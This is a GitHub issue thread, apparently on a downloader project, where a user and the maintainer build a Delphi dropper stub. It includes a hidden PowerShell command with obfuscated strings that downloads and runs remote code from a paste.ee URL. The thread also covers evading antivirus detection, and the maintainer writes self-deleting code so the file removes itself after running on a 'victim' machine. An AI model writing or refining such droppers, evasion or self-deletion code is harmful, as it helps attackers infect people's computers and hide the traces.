Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Self Destruct Feature #56

Open
msfcon5ol3 opened this issue Jan 20, 2023 · 9 comments
Open

Self Destruct Feature #56

msfcon5ol3 opened this issue Jan 20, 2023 · 9 comments

Comments

@msfcon5ol3
Copy link

This code snipped below is Delphi based, I was gonna use C# but too many AV detections. Could you help me to add a self-destruct function to delete the file from the disk after execution. Thanks for your help.

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'IEX(New-Object Net.WebClient).”`D`o`wn`l`oa`d`Str`in`g”(‘htt’ + ‘ps://’ + ‘paste.ee/r/l2tlb/0’)', nil, SW_HIDE);
end.
@UnamSanctam
Copy link
Owner

In the powershell command add a delay and then a command to remove the file (itself).

@msfcon5ol3
Copy link
Author

In the powershell command add a delay and then a command to remove the file (itself).

This worked but if there's a case in which the file is renamed by victim , this makes this command useless.
What could I do here instead of using the file name as the method of deletion ?

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item payload.exe -Force', nil, SW_HIDE);
end.

@UnamSanctam
Copy link
Owner

UnamSanctam commented Jan 20, 2023
edited
Loading

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

@msfcon5ol3
Copy link
Author

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

Could you edit the code for me please I'm noob in Delphi ?

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

@UnamSanctam
Copy link
Owner

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

@msfcon5ol3
Copy link
Author

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

image
Thanks but compilation error, I'm still trying to fix it....

@UnamSanctam
Copy link
Owner

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

@msfcon5ol3
Copy link
Author

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

Thanks finally it worked like charm, really appreciate your help. If you want you can add this as a new stub in UnamDownloader for the next release but you may have to add some delphi / pascal compiler to your repository and the other options such as start delay , fake error, run as admin etc.

@UnamSanctam
Copy link
Owner

No problem and great that it worked. And I probably won't use it since I'm planning on other things but thank you.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@UnamSanctam @msfcon5ol3